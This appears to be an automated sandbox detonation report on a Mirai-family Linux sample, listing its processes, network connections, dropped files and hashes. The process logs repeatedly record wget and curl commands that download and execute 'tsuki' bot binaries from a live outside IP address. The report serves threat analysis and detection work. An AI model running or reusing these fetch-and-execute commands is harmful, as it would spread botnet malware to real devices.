Analysis Overview
SHA256
95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
Threat Level: Known bad
The file 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae was found to be: Known bad.
Malicious Activity Summary
Mirai
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-22 00:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-22 00:17
Reported
2024-07-22 00:20
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
21s
Max time network
128s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki | /tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
Processes
/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
[/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| US | 151.101.193.91:443 | tcp | |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| GB | 195.181.164.14:443 | tcp | |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files
/tmp/tsuki.x86
| MD5 | f60ada8b79c2232773b9c08868c1c5fb |
| SHA1 | 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa |
| SHA256 | 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117 |
| SHA512 | 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8 |
/tmp/tsuki
| MD5 | 6cf78b3572c325d809ad4677c2ebd6a2 |
| SHA1 | be2f27c2b001f981344e52333568cb0dc7ffe7ad |
| SHA256 | c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0 |
| SHA512 | bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24 |
/tmp/tsuki
| MD5 | 2cf4b7e9a6fa11dbff627fc7aeee3f97 |
| SHA1 | 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb |
| SHA256 | eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d |
| SHA512 | 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57 |
/tmp/tsuki
| MD5 | 3cd8418ac8f414def6727fe141d328b9 |
| SHA1 | dc61b74e9e08ff3208ee96a6c94f8247e6196b99 |
| SHA256 | cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3 |
| SHA512 | 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9 |
/tmp/tsuki
| MD5 | eeed291445ee3e6bac53540dfd6cd91c |
| SHA1 | afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41 |
| SHA256 | 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78 |
| SHA512 | ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283 |
/tmp/tsuki
| MD5 | adf30c84e4d1a741bb51593fa750d624 |
| SHA1 | ca52225d16c403e9e6ab662e8dab63496281945d |
| SHA256 | 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806 |
| SHA512 | 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-22 00:17
Reported
2024-07-22 00:20
Platform
debian9-armhf-20240611-en
Max time kernel
37s
Max time network
65s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki | /tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
Processes
/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
[/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
